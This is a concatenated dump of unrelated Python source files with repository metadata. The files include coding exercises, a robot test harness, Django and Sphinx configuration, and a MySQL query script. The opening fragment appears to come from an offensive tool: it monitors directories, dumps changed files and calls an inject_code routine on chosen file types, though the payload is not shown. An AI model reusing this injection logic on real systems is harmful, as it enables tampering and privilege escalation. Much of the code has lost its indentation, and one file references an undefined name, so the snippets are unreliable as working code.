win32con.FILE_NOTIFY_CHANGE_SECURITY,
None,
None
)
for action, file_name in results:
full_filename = os.path.join(path_to_watch, file_name)
if action == FILE_CREATED:
print "[ + ] Created %s" % full_filename
elif action == FILE_DELETED:
print "[ - ] Deleted %s" % full_filename
elif action == FILE_MODIFIED:
print "[ * ] Modified %s" % full_filename
                    # Dump the file contents
                    print "[vvv] Dumping contents..."
                    contents = ""  # fallback so inject_code below never sees an undefined name
                    try:
fd = open(full_filename, "rb")
contents = fd.read()
fd.close()
print contents
print "[^^^] Dump complete."
except:
print "[!!!] Failed."
file_name, extension = os.path.splitext(full_filename)
if extension in file_types:
inject_code(full_filename, extension, contents)
elif action == FILE_RENAMED_FROM:
print "[ > ] Renamed from: %s" % full_filename
elif action == FILE_RENAMED_TO:
print "[ < ] Renamed to: %s" % full_filename
else:
print "[???] Unknown: %s" % full_filename
except:
pass
for path in dirs_to_monitor:
monitor_thread = threading.Thread(target=start_monitor, args=(path,))
print "Spawning monitoring thread for path: %s" % path
monitor_thread.start()
|
[
"justsweetpotato@gmail.com"
] |
justsweetpotato@gmail.com
|
9507e5df03c571625db06330a495aa6e7a1e0ef0
|
0062ceae0071aaa3e4e8ecd9025e8cc9443bcb3b
|
/solved/6763.py
|
fb5b2473763dfa94d66d8421c73bf7091835c434
|
[] |
no_license
|
developyoun/AlgorithmSolve
|
8c7479082528f67be9de33f0a337ac6cc3bfc093
|
5926924c7c44ffab2eb8fd43290dc6aa029f818d
|
refs/heads/master
| 2023-03-28T12:02:37.260233
| 2021-03-24T05:05:48
| 2021-03-24T05:05:48
| 323,359,039
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 282
|
py
|
a = int(input())
b = int(input())
c = b - a
text = 'You are speeding and your fine is $'
if c <= 0:
print('Congratulations, you are within the speed limit!')
elif 1 <= c <= 20:
print(text + '100.')
elif 21 <= c <= 30:
print(text + '270.')
else:
print(text + '500.')
|
[
"pyoun820@naver.com"
] |
pyoun820@naver.com
|
e67247615c0c14d544e7c8db298cd60b3f91b096
|
0258d1982f3551ebebcd1e657d4ab1b487f61df9
|
/src/m0.py
|
6928a42a0981785bf342e398d16e9ae37b1abf5a
|
[] |
no_license
|
royjm21/rosebotics2
|
0f5ffe379a2122c880b1701d3a05e08a037ce8ae
|
382fedc8bc2475bc928e453483e322e101399122
|
refs/heads/master
| 2020-04-02T14:09:12.657825
| 2018-11-17T03:27:16
| 2018-11-17T03:27:16
| 154,512,503
| 0
| 0
| null | 2018-10-24T14:10:02
| 2018-10-24T14:10:02
| null |
UTF-8
|
Python
| false
| false
| 3,132
|
py
|
"""
Capstone Project. Code for testing basics.
Author: David Mutchler, based on work by Dave Fisher and others.
READ and RUN this module but ** DO NOT MODIFY IT. **
Fall term, 2018-2019.
"""
import rosebotics as rb
import time
def main():
""" Runs tests. """
run_tests()
def run_tests():
""" Runs various tests. """
run_test_drive_system()
# run_test_touch_sensor()
# run_test_color_sensor()
def run_test_drive_system():
""" Tests the drive_system of the Snatch3rRobot. """
robot = rb.Snatch3rRobot()
print()
print("Testing the drive_system of the robot.")
print("Move at (20, 50) - that is, veer left slowly")
robot.drive_system.start_moving(20, 50)
time.sleep(2)
robot.drive_system.stop_moving()
print("Left/right wheel positions:",
robot.drive_system.left_wheel.get_degrees_spun(),
robot.drive_system.right_wheel.get_degrees_spun())
time.sleep(1)
print()
print("Spin clockwise at half speed for 2.5 seconds")
robot.drive_system.move_for_seconds(2.5, 50, -50)
print("Left/right wheel positions:",
robot.drive_system.left_wheel.get_degrees_spun(),
robot.drive_system.right_wheel.get_degrees_spun())
robot.drive_system.left_wheel.reset_degrees_spun()
robot.drive_system.right_wheel.reset_degrees_spun(2000)
time.sleep(1)
print()
print("Move forward at full speed for 1.5 seconds, coast to stop")
robot.drive_system.start_moving()
time.sleep(1.5)
robot.drive_system.stop_moving(rb.StopAction.COAST)
print("Left/right wheel positions:",
robot.drive_system.left_wheel.get_degrees_spun(),
robot.drive_system.right_wheel.get_degrees_spun())
def run_test_touch_sensor():
""" Tests the touch_sensor of the Snatch3rRobot. """
robot = rb.Snatch3rRobot()
print()
print("Testing the touch_sensor of the robot.")
print("Repeatedly press and release the touch sensor.")
print("Press Control-C when you are ready to stop testing.")
time.sleep(1)
count = 1
while True:
print("{:4}.".format(count),
"Touch sensor value is: ", robot.touch_sensor.get_value())
time.sleep(0.5)
count = count + 1
def run_test_color_sensor():
""" Tests the color_sensor of the Snatch3rRobot. """
robot = rb.Snatch3rRobot()
print()
print("Testing the color_sensor of the robot.")
print("Repeatedly move the robot to different surfaces.")
print("Press Control-C when you are ready to stop testing.")
time.sleep(1)
count = 1
while True:
print("{:4}.".format(count),
"Color sensor value/color/intensity is: ",
"{:3} {:3} {:3}".format(robot.color_sensor.get_value()[0],
robot.color_sensor.get_value()[1],
robot.color_sensor.get_value()[2]),
"{:4}".format(robot.color_sensor.get_color()),
"{:4}".format(robot.color_sensor.get_reflected_intensity()))
time.sleep(0.5)
count = count + 1
main()
|
[
"mutchler@rose-hulman.edu"
] |
mutchler@rose-hulman.edu
|
f8cfe37328e46d44a30edc92197b0790ae37e435
|
760e84fc1ae36ccad2bf70bfac3d2ff18291b8ac
|
/gimbal/test/servo/sysfs_writer_dummy.py
|
6ead1a4b63e134d6e6b9c6063c322b70430f4416
|
[] |
no_license
|
dpm76/Gimbal
|
43b11497221657848f41a6440945d0601b379e23
|
6803867b359db76a420b2cc46192e0c475e35e6b
|
refs/heads/master
| 2022-09-27T23:33:58.402529
| 2022-08-27T10:06:09
| 2022-08-27T10:06:09
| 79,473,892
| 5
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,705
|
py
|
'''
Created on 19 ene. 2017
@author: david
'''
class SysfsWriterDummyFactory(object):
"""
Creates SysfsWriterDummy object
"""
def create(self):
"""
Creates writer
"""
return SysfsWriterDummy()
class SysfsWriterDummy(object):
"""
System filesystem's writer dummy
"""
def __init__(self):
self._dummyFiles = {}
self._workingFilePath = ""
def setPath(self, path):
"""
        Set the file path. Any write operation will be performed on this path
@param path: Filepath
"""
self._workingFilePath = path
return self
def write(self, text):
"""
Writes contents on the current path. It flushes immediately.
If no path was previously set, an exception will be raised.
@param text: Contents as string
"""
if self._workingFilePath:
self._dummyFiles[self._workingFilePath] = text
else:
raise Exception("No working path set or file was closed.")
return self
def close(self):
"""
Closes the current path
"""
self._workingFilePath = ""
return self
def read(self, path):
"""
        Returns the contents of a path; raises an exception if the path doesn't exist
@param path: Filepath
"""
if path in self._dummyFiles:
contents = self._dummyFiles[path]
else:
raise Exception("The path '{0}' doesn\'t exist.".format(path))
return contents
|
[
"davidpm.itengineer@gmail.com"
] |
davidpm.itengineer@gmail.com
|
ca7bed30ee38167e59191c271b76792174e59050
|
f780e660df46040ab05fd1bcb9657f7db7db65d4
|
/conf.py
|
a74a25f953271940de926868f4ea07741e3417b5
|
[
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
systemonachip/systemonachip
|
35ffc00f4763333848cbca7e93a9e2cc1030b6de
|
6440b7ad7648a1affa1e6ddbdbf8d6fe76f57df7
|
refs/heads/main
| 2022-12-05T11:53:32.689536
| 2020-08-11T05:30:53
| 2020-08-11T05:30:53
| 283,394,238
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,926
|
py
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'System On a Chip'
copyright = '2020, Scott Shawcroft'
author = 'Scott Shawcroft'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.napoleon',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', '.env']
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
|
[
"scott@tannewt.org"
] |
scott@tannewt.org
|
10e9c876610b7fa2d64578976e7f2e46129f7bdb
|
21b5ad37b812ed78799d4efc1649579cc83d32fb
|
/job/migrations/0002_auto_20200212_1056.py
|
3c1cfe311d99524c0c1a26ac9408c01c9456878e
|
[] |
no_license
|
SaifulAbir/django-js-api
|
b6f18c319f8109884e71095ad49e08e50485bb25
|
fbf174b9cde2e7d25b4898f511df9c6f96d406cf
|
refs/heads/master
| 2023-02-12T16:09:21.508702
| 2021-01-14T09:05:15
| 2021-01-14T09:05:15
| 329,713,528
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 604
|
py
|
# Generated by Django 3.0.3 on 2020-02-12 10:56
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('job', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='job',
name='company_profile',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AlterField(
model_name='job',
name='created_date',
field=models.DateField(default=django.utils.timezone.now),
),
]
|
[
"rashed@ishraak.com"
] |
rashed@ishraak.com
|
6a67e5f262b74518db7e0ef4f6c9034700ff7848
|
238cff74530e5571648da88f127d086d2d9294b4
|
/0x0F-python-object_relational_mapping/0-select_states.py
|
76e5988a937a8573ef3ef92f91e4dd16f923e481
|
[] |
no_license
|
Achilik/holbertonschool-higher_level_programming-6
|
b92fcbd1bc6bbedcfef4b49bb3907d97b8be41ff
|
d0c46cc5ed2bfd1c8d75ce4a2a7604fc4f3f1c5c
|
refs/heads/master
| 2023-03-21T08:03:31.613145
| 2018-09-08T10:10:53
| 2018-09-08T10:10:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
#!/usr/bin/python3
"""List all states using mysqldb"""
if __name__ == "__main__":
import MySQLdb
from sys import argv
db = MySQLdb.connect(host="localhost", user=argv[1],
passwd=argv[2], db=argv[3])
cur = db.cursor()
cur.execute("SELECT id, name FROM states")
for row in cur.fetchall():
print("({}, '{}')".format(row[0], row[1]))
|
[
"sidneyriffic@gmail.com"
] |
sidneyriffic@gmail.com
|
0082a8cb5b9a83ed11b53f2a67daa38f739be429
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02382/s713591179.py
|
09cde9d080d0b47f07d303ae5fc2bac9e18b8f66
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 246
|
py
|
n = int(input())
X = list(map(int, input().split()))
Y = list(map(int, input().split()))
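# Minkowski distances D_p = (sum_j |x_j - y_j|**p) ** (1/p) for p = 1, 2, 3,
# then the Chebyshev distance (the p -> infinity limit) as the largest gap.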
for i in range(1, 4):
D = 0
for j in range(n):
D += abs(X[j] - Y[j])**(i)
print(D**(1/i))
print(max(abs(X[i] - Y[i]) for i in range(n)))
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
071deea967dc8da3caebd1c55e369f2362413914
|
4c20c78cf383cd40db8e3d3eee88e5f96884a1af
|
/39.combination_sum/39.combination-sum.py
|
6b75d489a8226c53faff5049bcc53be904b43fec
|
[] |
no_license
|
HanchengZhao/Leetcode-exercise
|
de6c17a2c965fe0c3afc0a4c39fc0a5f8bbe8d47
|
6c780a97c956856ac94a5d0bb4c9b631e7a0677a
|
refs/heads/master
| 2021-05-04T10:09:29.308858
| 2019-10-17T05:31:20
| 2019-10-17T05:31:20
| 50,731,817
| 7
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 721
|
py
|
#
# @lc app=leetcode id=39 lang=python3
#
# [39] Combination Sum
#
class Solution:
def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:
def recursion(cur, cursum, candidates, target, res, index):
if cursum > target:
return
if cursum == target:
res.append(cur)
return
# we can only use the numbers at/after this index to avoid duplicates
for i in range(index, len(candidates)):
num = candidates[i]
recursion(cur + [num], cursum + num, candidates, target, res, i)
res = []
recursion([], 0, candidates, target, res, 0)
return res
|
[
"chancidy@gmail.com"
] |
chancidy@gmail.com
|
0a7ba83dd16fddc2a53c7fbc33ae451f3e7d5ab5
|
b627f23744e305c0d90044669a6ec68cf59bc146
|
/src/ls_sms_api/ls_sms_api/wsgi.py
|
d309f6fbb20ae8fa35be63890cccb03c64dfd2ae
|
[] |
no_license
|
wisnercelucus/ls-sms-api
|
751689d0c11974547d9adcabcea91f06f404656d
|
9ff8bce77561641b6f7ba9b4e99378efbb8c0ef5
|
refs/heads/master
| 2022-04-12T21:52:37.619685
| 2020-03-26T20:04:46
| 2020-03-26T20:04:46
| 250,121,282
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 397
|
py
|
"""
WSGI config for ls_sms_api project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ls_sms_api.settings")
application = get_wsgi_application()
|
[
"wisnercelicus@gmail.com"
] |
wisnercelicus@gmail.com
|
4a437d4905608bd5f842a14f4a686edb4aa40ee5
|
19bc8a9343aa4120453abeff3deddda7d900f774
|
/ProgrammingInterviewQuestions/43_Anagrams.py
|
744e4ded887e1af67a814418dd617356895feac5
|
[] |
no_license
|
ArunkumarRamanan/CLRS-1
|
98643cde2f561d9960c26378ae29dd92b4c3fc89
|
f085db885bcee8d09c1e4f036517acdbd3a0918e
|
refs/heads/master
| 2020-06-28T08:30:44.029970
| 2016-11-19T15:27:55
| 2016-11-19T15:27:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 457
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Sun Oct 30 19:21:36 2016
@author: Rahul Patni
"""
def number_needed(a, b):
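    # Count the letter frequencies of both strings; the number of deletions
    # needed to make them anagrams is the sum of per-letter differences.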
array1 = [0] * 26
array2 = [0] * 26
for i in a:
array1[ord(i) - ord('a')] += 1
for i in b:
array2[ord(i) - ord('a')] += 1
total = 0
for i in range(0, 26):
total += abs(array1[i] - array2[i])
return total
a = raw_input().strip()
b = raw_input().strip()
print number_needed(a, b)
|
[
"rahul20patni@gmail.com"
] |
rahul20patni@gmail.com
|
3549f6ce778e95719ac1407a7e5ac63203c9c77f
|
7621cc5db1f87bc4c95ec1d0b80860c74787a0d1
|
/loco/urls.py
|
eab5993189bc2a7a303e55e7d953a6966601dd4b
|
[] |
no_license
|
ingenieroariel/loco
|
0b53f3c2e871db7d04a82b898c61ee63173e0f47
|
79245b63f082e5b393bacae87d44cea6df66dcff
|
refs/heads/master
| 2021-01-10T09:47:55.575723
| 2015-10-06T19:34:32
| 2015-10-06T19:34:32
| 43,713,454
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,177
|
py
|
"""loco URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic import ListView
from osm.models import Banks
from djgeojson.views import GeoJSONLayerView
from django.contrib.gis.measure import D
bancos_barranquilla = Banks.objects.filter(wkb_geometry__distance_lte=(barranquilla, D(km=20)))
urlpatterns = [
url(r'^$', ListView.as_view(queryset=bancos_barranquilla, template_name='osm/banks.html')),
url(r'^banks$', GeoJSONLayerView.as_view(model=Banks), name='data'),
url(r'^admin/', include(admin.site.urls)),
]
|
[
"ingenieroariel@gmail.com"
] |
ingenieroariel@gmail.com
|
f187e58d408ba609b2fb5abbcc73fb9cbd3f2144
|
3cf0d750948a758d5771dd778fbb783d64a044ae
|
/src/algo_cases/第4章/4_2.py
|
01cd88698a2920f4ad2133718f14a27994e6cd3d
|
[
"CC-BY-NC-SA-4.0",
"Apache-2.0"
] |
permissive
|
hbulpf/pydemo
|
6552a08b3c85721ac1b2ba335b030e234ad03b6c
|
ea3e9f9086116a86ecef803e9e3179a34c94c20f
|
refs/heads/master
| 2022-11-30T21:06:29.933820
| 2022-01-15T17:05:16
| 2022-01-15T17:05:16
| 237,584,300
| 6
| 1
|
Apache-2.0
| 2022-11-22T09:49:38
| 2020-02-01T08:20:43
|
Python
|
UTF-8
|
Python
| false
| false
| 1,160
|
py
|
def threeSum(self, array):
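    # Brute-force variant: O(n^3) over all index triples, with a linear scan
    # of `res` to skip duplicate triples.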
array.sort()
length=len(array)
res=[]
    for i in range(length):  # three nested loops
for j in range (i+1,length):
for k in range(j+1,length):
if array[i]+array[k]+array[j]==0 and not [array[i],array[j],array[k]] in res:
res.append([array[i],array[j],array[k]])
return res
def threeSum(self, array):
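    # Optimized variant: sort once, fix the smallest element, then close in
    # with two pointers for O(n^2) overall.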
array.sort()
res= []
for k in range(len(array) - 2):
if array[k] > 0: break
if k > 0 and array[k] == array[k - 1]: continue
l, r= k + 1, len(array) - 1
while l < r:
s = array[k] + array[l] + array[r]
if s < 0:
l += 1
                while l < r and array[l] == array[l - 1]: l += 1  # skip duplicate elements
elif s > 0:
r -= 1
while l < r and array[r] == array[r + 1]: r -= 1
else:
res.append([array[k], array[l], array[r]])
l += 1
r -= 1
while l < r and array[l] == array[l - 1]: l += 1
while l < r and array[r] == array[r + 1]: r -= 1
return res
|
[
"hudalpf@163.com"
] |
hudalpf@163.com
|
409252b48117af3db718766805d451249d2060cc
|
0725ed7ab6be91dfc0b16fef12a8871c08917465
|
/graphs/key_and_rooms.py
|
715456607ef58e9519dae068c8bde6f79cd99bf7
|
[] |
no_license
|
siddhism/leetcode
|
8cb194156893fd6e9681ef50c84f0355d09e9026
|
877933424e6d2c590d6ac53db18bee951a3d9de4
|
refs/heads/master
| 2023-03-28T08:14:12.927995
| 2021-03-24T10:46:20
| 2021-03-24T10:46:20
| 212,151,205
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,172
|
py
|
from collections import defaultdict
class Graph:
def __init__(self, V):
self.graph = defaultdict(list)
self.V = V
self.visited = [False for _ in range(self.V + 1)]
def add_edge(self, u, v):
self.graph[u].append(v)
def DFSUtil(self, u):
self.visited[u] = True
# print u,
for neighbour in self.graph[u]:
if not self.visited[neighbour]:
self.DFSUtil(neighbour)
def DFS(self, u):
self.DFSUtil(u)
def print_graph(self):
for k, v in self.graph.items():
print k, ' -> ', v
class Solution(object):
def canVisitAllRooms(self, rooms):
"""
:type rooms: List[List[int]]
:rtype: bool
"""
# build graph
graph = Graph(len(rooms))
for room_index, keys in enumerate(rooms):
for key in keys:
graph.add_edge(room_index, key)
# graph.print_graph()
graph.DFS(0)
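        # Every room is reachable iff the DFS from room 0 visited all nodes.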
all_visited = True
for i in range(len(rooms)):
if not graph.visited[i]:
all_visited = False
break
return all_visited
|
[
"siddhesh@hackerearth.com"
] |
siddhesh@hackerearth.com
|
2345216ef12a7ccfdb9d835b9d96af3569cd556a
|
c5d131cf7a5e5667b5f6983512d132f9817c7310
|
/geosite/views.py
|
d7bdc0815adbffb6a4a95113c6636eef66b60b3b
|
[] |
no_license
|
wfp-ose/geosite-framework-django
|
0e6596d241498cfe3b5bb696abee27da511a8b1d
|
ffb3f805cca708e7b95abe59a1b1b8e3916783a3
|
refs/heads/master
| 2021-01-21T04:55:47.253100
| 2016-06-03T15:37:21
| 2016-06-03T15:37:21
| 51,529,078
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,424
|
py
|
import errno
from socket import error as socket_error
from django.conf import settings
from django.views.generic import View
from django.shortcuts import HttpResponse, render_to_response
try:
import simplejson as json
except ImportError:
import json
from geosite.cache import provision_memcached_client
class geosite_data_view(View):
key = None
content_type = "application/json"
def _build_key(self, request, *args, **kwargs):
return self.key
def _build_data(self):
raise Exception('geosite_data_view._build_data should be overwritten')
def get(self, request, *args, **kwargs):
data = None
if settings.GEOSITE_CACHE_DATA:
client = provision_memcached_client()
if client:
key = self._build_key(request, *args, **kwargs)
print "Checking cache with key ", key
data = None
try:
data = client.get(key)
except socket_error as serr:
data = None
print "Error getting data from in-memory cache."
if serr.errno == errno.ECONNREFUSED:
print "Memcached is likely not running. Start memcached with supervisord."
raise serr
if not data:
print "Data not found in cache."
data = self._build_data(request, *args, **kwargs)
try:
client.set(key, data)
except socket_error as serr:
print "Error saving data to in-memory cache."
if serr.errno == errno.ECONNREFUSED:
print "Memcached is likely not running or the data exceeds memcached item size limit. Start memcached with supervisord."
raise serr
else:
print "Data found in cache."
else:
print "Could not connect to memcached client. Bypassing..."
data = self._build_data(request, *args, **kwargs)
else:
print "Not caching data (settings.GEOSITE_CACHE_DATA set to False)."
data = self._build_data(request, *args, **kwargs)
return HttpResponse(json.dumps(data, default=jdefault), content_type=self.content_type)
def jdefault(o):
return o.__dict__
|
[
"pjdufour.dev@gmail.com"
] |
pjdufour.dev@gmail.com
|
b4ecd05bf9fcf51d6c49b525e8a5af982ae4959d
|
c1a04c3dd2956ffd055020d5a73ceeb18b0367fe
|
/tests/builtins/test_bool.py
|
8a7cb0994edcab1e7d566c000ded0430d8afbc03
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
matthewphillips/batavia
|
1f145d0ac2182875c6d1734fbc8510a654ee932e
|
b69c1f419674ecf214c474c754912f2e0cf5c65d
|
refs/heads/master
| 2021-01-21T06:33:04.213885
| 2017-02-26T22:10:50
| 2017-02-26T22:10:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,383
|
py
|
from .. utils import TranspileTestCase, BuiltinFunctionTestCase
import unittest
class BoolTests(TranspileTestCase):
def test_bool_omitted(self):
self.assertCodeExecution("""
print(bool())
""")
def test_bool_like(self):
self.assertCodeExecution("""
class BoolLike:
def __init__(self, val):
self.val = val
def __bool__(self):
return self.val == 1
print(bool(BoolLike(0)))
print(bool(BoolLike(1)))
""")
def test_len_only(self):
self.assertCodeExecution("""
class LenButNoBool:
def __init__(self, val):
self.val = val
def __len__(self):
return self.val
print(bool(LenButNoBool(0)))
print(bool(LenButNoBool(1)))
""")
def test_no_bool_no_len(self):
self.assertCodeExecution("""
class NoLenNoBool:
def __init__(self, val):
self.val = val
print(bool(NoLenNoBool(0)))
print(bool(NoLenNoBool(1)))
print(bool(NoLenNoBool(42)))
print(bool(NoLenNoBool(-2)))
""")
class BuiltinBoolFunctionTests(BuiltinFunctionTestCase, TranspileTestCase):
functions = ["bool"]
|
[
"russell@keith-magee.com"
] |
russell@keith-magee.com
|
d5997425aae6fc467a61b580ad532ab834fe952f
|
f40cc44ebfc337326577c91cd88d0c1dd845b098
|
/LuminarPythonPrograms/Collection/ListDemo/Listprogram3.py
|
1150ec798fe3462679fb73faf13793e2b97562f8
|
[] |
no_license
|
Aswin2289/LuminarPython
|
6e07d6f9bf6c8727b59f38f97f5779a33b2fab0d
|
ba633a276dd79bbf214cfceac2413c894eaa1875
|
refs/heads/master
| 2023-01-01T07:52:41.598110
| 2020-10-13T04:34:49
| 2020-10-13T04:34:49
| 290,109,547
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 158
|
py
|
# print each element raised to the power of its 1-based position
lst=[2,4,6]
# le=len(lst)
# res=0
# for i in range(0,le):
# res=lst[i]**i
# print(res)
cnt=1
for i in lst:
print(i**cnt)
cnt+=1
|
[
"aswinabraham4@gmail.com"
] |
aswinabraham4@gmail.com
|
916b8f251e993a18dbf69cffb2c0341c30bcdbc2
|
3e600966adc8f0fe7114d5d988b32ead395edff2
|
/src/pybel_tools/definition_utils/summary_dependent.py
|
58d64d00c93a2c7a81b2bf6591dcd2dc565b6dae
|
[
"Apache-2.0"
] |
permissive
|
johnbachman/pybel-tools
|
cadf407609462b9c2faaa62e5d35464fa27c1b7f
|
c691d7b33d449501142eb011bc2b8f63830645cf
|
refs/heads/develop
| 2021-09-14T20:30:07.873760
| 2018-05-10T14:07:08
| 2018-05-10T14:07:08
| 105,606,597
| 0
| 0
| null | 2017-10-03T02:23:24
| 2017-10-03T02:23:23
| null |
UTF-8
|
Python
| false
| false
| 3,443
|
py
|
# -*- coding: utf-8 -*-
import logging
import os
from pybel.constants import *
from pybel.resources.definitions import write_namespace
from pybel.struct.summary.node_summary import get_names_by_namespace
from ..summary.error_summary import get_incorrect_names_by_namespace, get_undefined_namespace_names
log = logging.getLogger(__name__)
__all__ = [
'export_namespace',
'export_namespaces',
]
def export_namespace(graph, namespace, directory=None, cacheable=False):
"""Exports all names and missing names from the given namespace to its own BEL Namespace files in the given
directory.
Could be useful during quick and dirty curation, where planned namespace building is not a priority.
:param pybel.BELGraph graph: A BEL graph
:param str namespace: The namespace to process
:param str directory: The path to the directory where to output the namespace. Defaults to the current working
directory returned by :func:`os.getcwd`
:param bool cacheable: Should the namespace be cacheable? Defaults to ``False`` because, in general, this operation
will probably be used for evil, and users won't want to reload their entire cache after each
iteration of curation.
"""
directory = os.getcwd() if directory is None else directory
path = os.path.join(directory, '{}.belns'.format(namespace))
with open(path, 'w') as file:
log.info('Outputting to %s', path)
right_names = get_names_by_namespace(graph, namespace)
log.info('Graph has %d correct names in %s', len(right_names), namespace)
wrong_names = get_incorrect_names_by_namespace(graph, namespace)
        log.info('Graph has %d incorrect names in %s', len(wrong_names), namespace)
undefined_ns_names = get_undefined_namespace_names(graph, namespace)
        log.info('Graph has %d names in missing namespace %s', len(undefined_ns_names), namespace)
names = (right_names | wrong_names | undefined_ns_names)
if 0 == len(names):
log.warning('%s is empty', namespace)
write_namespace(
namespace_name=namespace,
namespace_keyword=namespace,
namespace_domain='Other',
author_name=graph.authors,
author_contact=graph.contact,
citation_name=graph.name,
values=names,
cacheable=cacheable,
file=file
)
def export_namespaces(graph, namespaces, directory=None, cacheable=False):
"""Thinly wraps :func:`export_namespace` for an iterable of namespaces.
:param pybel.BELGraph graph: A BEL graph
:param iter[str] namespaces: An iterable of strings for the namespaces to process
:param str directory: The path to the directory where to output the namespaces. Defaults to the current working
directory returned by :func:`os.getcwd`
:param bool cacheable: Should the namespaces be cacheable? Defaults to ``False`` because, in general, this operation
will probably be used for evil, and users won't want to reload their entire cache after each
iteration of curation.
"""
directory = os.getcwd() if directory is None else directory # avoid making multiple calls to os.getcwd later
for namespace in namespaces:
export_namespace(graph, namespace, directory=directory, cacheable=cacheable)
|
[
"cthoyt@gmail.com"
] |
cthoyt@gmail.com
|
5f537997bcb48f2972f8668304590a3e7b11e283
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_034/ch129_2020_04_01_17_00_30_862850.py
|
b356e9c2aff07bffe76f355aa509f1e0320549e5
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 172
|
py
|
def verifica_quadrado_perfeito(n):
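    # A perfect square k**2 equals the sum of the first k odd numbers
    # (1 + 3 + 5 + ... + (2k - 1)), so subtract consecutive odd numbers
    # and check whether we land exactly on zero.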
impar = 1
    while n > 0:  # with "n != 0" a non-square would go negative and loop forever
n = n - impar
impar += 2
if n == 0:
return True
    else:
return False
|
[
"you@example.com"
] |
you@example.com
|
d43ed31749be13b25dc97002e6e7499aad5038d9
|
8ea2d923fcb193846ff925abcbef8f97c394936e
|
/climate_app/views.py
|
2fc27ba7af83708082858e0ac79e0b6629ad1e72
|
[] |
no_license
|
amrit-kumar/climate_data_and_graph
|
6a32b969e3d13953f1e74baed720e824d7dd61b0
|
c793bd38474ba11ef50b76739d979f3f8c910dbf
|
refs/heads/master
| 2021-01-16T18:55:32.359620
| 2017-08-12T18:28:52
| 2017-08-12T18:28:52
| 100,129,094
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,211
|
py
|
import requests
from django.http.response import HttpResponse
from .models import ClimateData,ClimateStatistics
from urllib.request import Request,urlopen
from django.core.files import File
from django.core.files.temp import NamedTemporaryFile
import re
from django.shortcuts import render
from django.core.files.storage import FileSystemStorage
import os
import csv
import uuid
def get_file_climate_condition(urls,region):
for url in urls:
res = requests.get(url)
file_temp = NamedTemporaryFile()
file_temp.write(res.content)
file_temp.flush()
climate_obj = ClimateData()
climate_obj.region = region
climate_obj.save()
if "Tmax" in url:
climate_obj.max_temp.save("Maxtemp", File(file_temp))
